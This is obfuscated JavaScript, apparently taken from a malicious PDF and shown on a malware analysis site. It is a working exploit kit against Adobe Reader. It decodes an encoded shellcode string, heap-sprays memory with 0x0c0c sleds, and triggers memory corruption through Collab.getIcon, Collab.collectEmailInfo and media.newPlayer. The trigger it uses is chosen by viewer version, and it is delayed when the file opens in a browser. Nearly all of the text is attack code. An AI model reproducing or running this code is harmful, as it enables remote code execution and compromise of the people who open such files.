var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.